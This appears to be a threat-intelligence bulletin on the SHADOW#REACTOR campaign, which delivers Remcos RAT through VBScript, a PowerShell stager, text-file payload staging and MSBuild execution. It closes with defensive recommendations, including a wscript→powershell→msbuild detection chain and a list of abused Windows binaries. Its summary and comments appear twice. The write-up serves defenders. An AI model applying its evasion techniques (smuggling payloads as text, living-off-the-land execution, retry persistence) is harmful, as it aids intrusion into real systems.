New Malware Campaign Delivers Remcos RAT Through Multi-Stage Windows Attack
Summary:
Securonix Threat Research has identified a new multi-stage malware campaign, dubbed SHADOW#REACTOR, which utilizes a sophisticated chain of obfuscated scripts and fileless execution to deploy the Remcos RAT. The infection begins with a user executing a malicious VBScript, often delivered via social engineering. This script acts as a launcher, suppressing errors and invoking a PowerShell stager. The PowerShell component leverages a text-only staging mechanism, downloading fragmented payloads from a remote command-and-control server. These text files are reconstructed in memory into a .NET Reactor-protected assembly, which is then reflectively loaded to bypass static detection. The final stage utilizes legitimate Windows tools, specifically MSBuild[.]exe, to execute the Remcos RAT payload, granting the attackers persistent remote control, keylogging capabilities, and file system access. The campaign is notable for its self-healing design, where the malware repeatedly attempts to re-download payloads if integrity checks fail, and its use of "junk" PowerShell commands to generate noise and evade analysis.
Security Officer Comments:
This campaign represents a significant evolution in how commodity malware is delivered. While Remcos RAT is a well-known tool often associated with lower-tier cybercrime, the SHADOW#REACTOR loader demonstrates a high level of operational security designed to bypass traditional endpoint protection. The use of ".text" files to smuggle binary code allows the malware to slip past email gateways and network scanners that typically flag executable content. Furthermore, the reliance on Living-off-the-Land binaries like wscript.exe and MSBuild[.]exe means that detection logic based solely on known bad file hashes will likely fail. This campaign appears to be opportunistic and financially motivated, targeting a broad spectrum of industries rather than specific verticals. Consequently, organizations with smaller security teams or those relying on signature-based antivirus are at the highest risk. The "self-healing" network behavior also implies that simple, temporary network blocks may not be sufficient to stop the infection once the initial script is running; the malware is programmed to wait and retry, ensuring persistence on the endpoint.
Suggested Corrections:
Link(s):
https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html
Securonix Threat Research has identified a new multi-stage malware campaign, dubbed SHADOW#REACTOR, which utilizes a sophisticated chain of obfuscated scripts and fileless execution to deploy the Remcos RAT. The infection begins with a user executing a malicious VBScript, often delivered via social engineering. This script acts as a launcher, suppressing errors and invoking a PowerShell stager. The PowerShell component leverages a text-only staging mechanism, downloading fragmented payloads from a remote command-and-control server. These text files are reconstructed in memory into a .NET Reactor-protected assembly, which is then reflectively loaded to bypass static detection. The final stage utilizes legitimate Windows tools, specifically MSBuild[.]exe, to execute the Remcos RAT payload, granting the attackers persistent remote control, keylogging capabilities, and file system access. The campaign is notable for its self-healing design, where the malware repeatedly attempts to re-download payloads if integrity checks fail, and its use of "junk" PowerShell commands to generate noise and evade analysis.
Security Officer Comments:
This campaign represents a significant evolution in how commodity malware is delivered. While Remcos RAT is a well-known tool often associated with lower-tier cybercrime, the SHADOW#REACTOR loader demonstrates a high level of operational security designed to bypass traditional endpoint protection. The use of ".text" files to smuggle binary code allows the malware to slip past email gateways and network scanners that typically flag executable content. Furthermore, the reliance on Living-off-the-Land binaries like wscript.exe and MSBuild[.]exe means that detection logic based solely on known bad file hashes will likely fail. This campaign appears to be opportunistic and financially motivated, targeting a broad spectrum of industries rather than specific verticals. Consequently, organizations with smaller security teams or those relying on signature-based antivirus are at the highest risk. The "self-healing" network behavior also implies that simple, temporary network blocks may not be sufficient to stop the infection once the initial script is running; the malware is programmed to wait and retry, ensuring persistence on the endpoint.
Suggested Corrections:
- Increase user awareness of script-based threats: Educate users on the risks of executing downloaded scripts and emphasize caution around unexpected files, “update” prompts, or document-related artifacts received via web downloads or untrusted sources.
- Validate script execution sources: Restrict or monitor execution of VBS, JS, and PowerShell scripts, particularly those originating from user-writable locations such as %TEMP%, browser cache directories, or downloaded file paths.
- Harden endpoint detection and response (EDR): Ensure EDR solutions are capable of detecting suspicious script interpreter behavior, including anomalous parent-child process chains such as:wscript.exe → powershell.exe → msbuild.exeand reflective .NET assembly loading patterns.
- Leverage advanced PowerShell and scripting telemetry: Enable enhanced PowerShell logging (ScriptBlock logging, Module logging, command-line auditing) to surface heavily obfuscated, multi-stage payload reconstruction activity.
- Monitor forLOLBin abuse: Actively hunt for misuse of trusted binaries such as wscript.exe, powershell.exe, mshta.exe, and MSBuild.exe, especially when invoked from non-standard execution paths or user contexts.
- Watch for persistence artifacts: Monitor for suspicious Startup folder shortcuts, scheduled task creation, and benign-looking executables written to %TEMP%, ProgramData, or user profile directories.
Link(s):
https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html